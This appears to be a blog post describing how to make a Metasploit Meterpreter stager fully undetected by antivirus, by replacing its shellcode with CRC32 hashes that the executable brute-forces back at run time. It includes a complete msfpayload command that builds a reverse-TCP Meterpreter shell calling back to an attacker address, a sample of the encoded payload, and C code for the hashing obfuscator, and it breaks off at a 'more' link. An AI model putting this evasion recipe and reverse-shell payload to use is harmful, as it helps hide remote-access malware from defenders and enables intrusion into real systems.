Posts Tagged ‘fully undetected’

The previous entry was about lowering detection rates on AV by just simply recompiling and/or optimizing the source. This worked pretty well except for the really known tools like meterpreter. So let’s continue where we left off and make a undetectable executable for psexec purposes. First thing I did was the most obvious thing of course, I followed the shellcodeexec instructions and generated a metasploit alpha-numeric shellcode. Then I adjusted the source of shellcodeexec to incorporate the shellcode instead of passing it as an argument. This however failed miserably and the detection ratio was higher then 6/46. Then it hit me: I had lowered the detection rate on the ‘stage’ part and NOT on the ‘stager’ part. So that means we have to make some more executable code undetected, this time we’ll put a little bit more of effort into it:

FUD

Now that looks pretty sweet doesn’t it? 0/46 seems this time we don’t have to be happy with just lowering the detection rate, we have fully evaded it. Let’s have a look at how we can do this:

The concept of “self brute forcing” was used, but instead of using a cipher like AES, I used hashes. Normally you encrypt the entire payload with a weak key and then upon execution you brute force the key, hyperion is an example of this technique.  It’s pretty bulky still since the entire payload is just one big blob.  So I thought why only brute force the key and not the entire payload? So I modified the already undetected shellcodeexec to contain only hashes of the meterpreter payload. This way it’s a single executable that you can use for all kind of stuff. Don’t forget however that it’s still staged, so with this we are making the ‘stager’ part fully undetectable, but not the actual stage. If you need just one exe without stages have a look at ultimet.

Let’s generate the shellcode that is being detected:

cd /opt/metasploit-4.5.0/app
msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=10.50.0.103 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

Which looks like this:

PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2[…]

That doesn’t look to hard to obfuscate does it? Let’s go at it one step at the time. First we decide what hashing algorithm we want to use. For the POC implementation I went with CRC32 which is fast and the code is small. Then you have to decide how much data you want to brute force, the more data you brute force the longer it takes. So I went for a 3 character brute force. Now that we know all this we can get hands-on and build the obfuscator and then implement the bruteforcer into shellcodeexec. The obfuscator looks like this:

void genhashes(char *s,int len,int steps){
	int i,j;
	char *data = (char *)malloc(steps);
	memset(data,0,steps);

	printf("\n");
	for(i=0;i<len;i+=steps){
		for(j=0;j<steps;j++){
			data[j] = s[i+j];
		}
		printf("%u,",crc32(&data[0],strlen(data)));
	}
	free(data);
}

Like you can see it loops through the string and hashes per the given amount of characters, which are outputted in C array friendly format. So now your payload looks like this:

4152682635,2930860581,2930860581,2930860581,2930860581,2930860581,4135321336,919810150,[…]

(more…)